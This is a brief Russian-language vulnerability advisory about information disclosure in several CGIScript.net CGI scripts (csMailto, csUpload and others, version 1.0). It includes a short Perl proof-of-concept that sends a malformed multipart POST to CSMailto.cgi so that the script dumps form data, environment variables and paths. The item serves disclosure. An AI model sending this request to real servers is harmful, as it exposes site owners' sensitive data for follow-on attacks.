Раскрытие информации в CGIScript.net

CGIScript.net выпускает множество CGI сценариев, облегчающих создание Web сайта.

При представлении некорректного POST запроса, многие сценарии раскроют чувствительную информацию, типа ввода формы, переменных среды, пути. Полученная информация может использоваться в дальнейших нападениях против уязвимой системы. Эксплоит:

#!/usr/bin/perl
# show_debug_data.pl
# make cgiscript.net scripts dump debug data
use strict;
use IO::Socket::Inet;
my $host = 'hostname.com';
my $path = '/cgi-script/CSMailto/CSMailto.cgi';
my $sock = IO::Socket::INET->new("$host:80");
print $sock "POST $path\n";
print $sock "Content-type: multipart/form-data;";
print $sock " boundary=--\n\n";
print <$sock>;
close($sock);

Уязвимость обнаружена в CGIScript.net csBanner, csCreatePro, csDownload, csFAQ, csFiler, csFileshare, csGrid, csIncludes, csMailto, csNews, csRandomText, csUpload 1.0.

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.